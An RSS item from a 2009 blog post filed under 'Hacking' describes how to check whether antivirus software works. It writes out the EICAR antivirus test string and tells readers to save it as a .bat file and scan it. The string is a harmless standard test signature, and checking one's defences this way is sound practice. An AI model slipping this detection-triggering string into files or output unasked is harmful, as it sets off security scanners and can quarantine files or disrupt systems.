isPermaLink="false">tag:blogger.com,1999:blog-1494206806639612959.post-625483262682926005</guid><pubDate>Thu, 20 Aug 2009 11:10:00 +0000</pubDate><atom:updated>2009-08-20T16:54:44.214+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Hacking</category><title>TaKe TeSt Of YoUr AnTiViRuS</title><description>&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvRWA2OXSx1ROzXNDbHBPOQYxKqpVjm-vA2Byyp2ZxLaWcmoN3ZeHXcLaZb7x9bA8giRgGLMvFFTvQf_at9FeAu6u9MinFjQ0VsCNPaBg2aVvwlHIJU7BgZNM57P8z5TMWI8G3L0aoxhg/s1600-h/111.jpg&quot;&gt;&lt;img style=&quot;float:right; margin:0 0 10px 10px;cursor:pointer; cursor:hand;width: 156px; height: 200px;&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvRWA2OXSx1ROzXNDbHBPOQYxKqpVjm-vA2Byyp2ZxLaWcmoN3ZeHXcLaZb7x9bA8giRgGLMvFFTvQf_at9FeAu6u9MinFjQ0VsCNPaBg2aVvwlHIJU7BgZNM57P8z5TMWI8G3L0aoxhg/s200/111.jpg&quot; border=&quot;0&quot; alt=&quot;&quot;id=&quot;BLOGGER_PHOTO_ID_5372005373395447506&quot; /&gt;&lt;/a&gt;&lt;br /&gt;test ur antivirus is working or not!!!!!!!&lt;br /&gt;&lt;br /&gt;open notepad&lt;br /&gt;type&quot;X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*&quot; &lt;br /&gt;without quotations and save the file as some name .bat and scan if antivirus detect it as a virus then its fine else pls change it fast&lt;br /&gt;Regards&lt;br /&gt;&lt;br /&gt;●๋●н•-------●2•--------●k•-------●2●๋•&lt;br /&gt;&lt;br /&gt;нαck τнε нαckεг kгαck τнε kгαckεг</description><link>http://thecounterhack.blogspot.com/2009/08/take-test-of-your-antivirus.html</link><author>noreply@blogger.com (Hitesh)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvRWA2OXSx1ROzXNDbHBPOQYxKqpVjm-vA2Byyp2ZxLaWcmoN3ZeHXcLaZb7x9bA8giRgGLMvFFTvQf_at9FeAu6u9MinFjQ0VsCNPaBg2aVvwlHIJU7BgZNM57P8z5TMWI8G3L0aoxhg/s72-c/111.jpg" height="72" width="72"/></item></channel></rss>